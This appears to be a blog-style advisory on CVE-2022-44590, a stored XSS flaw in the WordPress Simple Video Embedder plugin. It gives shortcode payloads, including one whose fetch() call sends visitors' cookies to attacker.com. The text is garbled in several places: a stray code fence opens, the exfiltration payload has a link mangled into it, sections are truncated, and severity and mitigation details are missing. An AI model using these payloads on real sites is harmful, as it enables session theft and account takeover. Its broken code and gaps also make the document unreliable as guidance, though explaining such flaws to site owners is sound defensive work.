CVE-2022-44590 - Authenticated Stored XSS in WordPress Simple Video Embedder ≤ 2.2 – Exploit Details & How It Works

If your WordPress site uses the Simple Video Embedder plugin by James Lao, read on: A vulnerability, logged as CVE-2022-44590, could let attackers inject malicious scripts right into your site – if they have contributor-level access or higher. Let’s break down what this means, show how the attack works, and explain how to protect your site.

What is CVE-2022-44590?

CVE-2022-44590 identifies a Stored Cross-Site Scripting (XSS) vulnerability in Simple Video Embedder plugin, version 2.2 and below. If a logged-in user with at least ‘contributor’ rights enters malicious JavaScript into the shortcode fields, the script gets stored in your WordPress database. Anytime an admin or visitor loads the affected page, the browser runs that code – potentially stealing cookies, redirecting, or defacing the site.

How the Exploit Works

Simple Video Embedder lets you add videos using a shortcode like [embeded]. The problem? The plugin does not sanitize input correctly. If an attacker enters <script>alert('XSS');</script> into the video URL or other fields, that code gets stored. When the post is viewed, the script runs.

What an attacker can do

- Steal admin cookies/session

Proof-of-Concept Exploit (Simple Example)

Suppose you have a WordPress account with contributor rights (can write posts, but can’t publish). You make a new post and insert:

[embeded]"><script>alert('XSS by Contributor');</script>

If the admin reviews or previews this post, they’ll see a popup – and now you know the XSS worked.

`php

[embeded]">fetch('<a href="https://attacker.com/?c='+document.cookie" rel="nofollow">https://attacker.com/?c='+document.cookie</a>)

Real-World Impact & Severity

Who is at risk:

Especially sites allowing contributors from the public or team

Severity:

Restrict contributor privileges: Only give needed users access.

- WAF/WordPress Security Plugins: Basic filtering helps but not a full fix unless the plugin developer fixes it.

References & Further Reading

- WPScan Advisory: CVE-2022-44590
- NVD – CVE-2022-44590 Detail
- Simple Video Embedder on WordPress.org
- OWASP XSS Overview

Summary

CVE-2022-44590 is a glaring XSS vulnerability in the Simple Video Embedder plugin that puts your WordPress site at serious risk if you allow contributors (or higher). Attackers can store JavaScript in posts, and when others view the page, scripts execute in their browser.

Patch, update, or remove the plugin immediately!

*Exclusive tip: Regularly audit your WordPress plugins for vulnerabilities using WPVulnDB to stay ahead of threats.*

Timeline

Published on: 11/09/2022 22:15:00 UTC
Last modified on: 11/10/2022 19:23:00 UTC